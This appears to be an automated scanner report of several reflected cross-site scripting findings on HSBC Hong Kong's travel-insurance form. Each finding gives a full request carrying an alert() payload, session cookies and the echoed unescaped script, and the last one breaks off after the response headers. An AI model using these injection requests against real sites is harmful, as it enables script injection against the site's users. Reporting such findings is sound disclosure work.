The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d989"%3balert(1)//ffb3e0bcf8c8e65a5 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 1d989";alert(1)//ffb3e0bcf8c8e65a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50502e&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=&PC_7_1_CKB_input.peopletravelling=B1d989"%3balert(1)//ffb3e0bcf8c8e65a5&input.no_of_children=3&PC_7_1_CKB_number_of_children=3&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=Y&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=3&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=30&PC_7_1_CKB_cmd_get_quote.y=12 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/hk/insurance/travel?pwscmd=cmd_init
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190756; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:08:38 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:28 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var checkSubmit = "B1d989";alert(1)//ffb3e0bcf8c8e65a5";
   var trip_type = "";
   var trip_option = document.getElementsByName("PC_7_1_CKB_input.trip_type");
   for (var i = 0; i < 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].valu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 65693%3balert(1)//fa7cf0ceb078b98f0 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as 65693;alert(1)//fa7cf0ceb078b98f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50502e&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=365693%3balert(1)//fa7cf0ceb078b98f0&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=Y&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=3&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=30&PC_7_1_CKB_cmd_get_quote.y=12 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/hk/insurance/travel?pwscmd=cmd_init
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190756; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:08:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:30 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var input_numberOfChildren = 365693;alert(1)//fa7cf0ceb078b98f0;
   var checkSubmit = "B";
   var PC_7_1_CKB_no_of_children_list=document.getElementById("PC_7_1_CKB_no_of_children_list");

   if (checkSubmit=="C"||checkSubmit=="B"||checkSubmit=="F") {
       var html='<label
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dcd60%3balert(1)//0b96acd41133d8c9a was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as dcd60;alert(1)//0b96acd41133d8c9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50502e&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=3&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=Y&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=3dcd60%3balert(1)//0b96acd41133d8c9a&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=30&PC_7_1_CKB_cmd_get_quote.y=12 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/hk/insurance/travel?pwscmd=cmd_init
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190756; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:08:43 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:34 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</label>';
           var input_numberOfFriend = 3dcd60;alert(1)//0b96acd41133d8c9a;
           if(checkSubmit=="R"){
               document.getElementById("PC_7_1_CKB_no_of_rf_question").style.display="none";
               document.getElementById("PC_7_1_CKB_no_of_rf_question").innerHTML="";
           }else{
               docu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a417%3balert(1)//9327e05363b was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 9a417;alert(1)//9327e05363b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=Beed86%22%3balert(document.location)//bce1ca0334318ecc&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=19a417%3balert(1)//9327e05363b&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/8
Cookie: CAMToken=EtQx8ZNKxzN7+GP2EwdgJpCKS8M=; HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811191231%2CCAVP20110811190908; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:13:55 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:14:46 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 61886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
< 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].value;
       }
   }
   if(trip_type =="S"){
       var checkRF = 19a417;alert(1)//9327e05363b;
       var rf_html="";
       var crf_html="";
       if(checkRF==1){
           crf_html='<label class="hsbcCustomText">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f314"%3balert(1)//5a389706e86 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 8f314";alert(1)//5a389706e86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=8f314"%3balert(1)//5a389706e86&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/8
Cookie: CAMToken=EtQx8ZNKxzN7+GP2EwdgJpCKS8M=; HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811191231%2CCAVP20110811190908; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:13:50 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:14:41 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 61815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var checkSubmit = "8f314";alert(1)//5a389706e86";
   var trip_type = "";
   var trip_option = document.getElementsByName("PC_7_1_CKB_input.trip_type");
   for (var i = 0; i < 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].valu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5dea%3balert(1)//19c929529ef was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as f5dea;alert(1)//19c929529ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=Beed86%22%3balert(document.location)//bce1ca0334318ecc&input.no_of_children=3&PC_7_1_CKB_number_of_children=falsef5dea%3balert(1)//19c929529ef&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/8
Cookie: CAMToken=EtQx8ZNKxzN7+GP2EwdgJpCKS8M=; HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811191231%2CCAVP20110811190908; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:13:53 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:14:44 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 61886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var input_numberOfChildren = falsef5dea;alert(1)//19c929529ef;
   var checkSubmit = "Beed86";alert(document.location)//bce1ca0334318ecc";
   var PC_7_1_CKB_no_of_children_list=document.getElementById("PC_7_1_CKB_no_of_children_list");

   if (checkSubmit=="C"||checkSu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5ba8d%3balert(1)//2437f3f8a0d was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as 5ba8d;alert(1)//2437f3f8a0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=Beed86%22%3balert(document.location)//bce1ca0334318ecc&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false5ba8d%3balert(1)//2437f3f8a0d&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/8
Cookie: CAMToken=EtQx8ZNKxzN7+GP2EwdgJpCKS8M=; HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811191231%2CCAVP20110811190908; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:13:57 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:14:47 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 61886

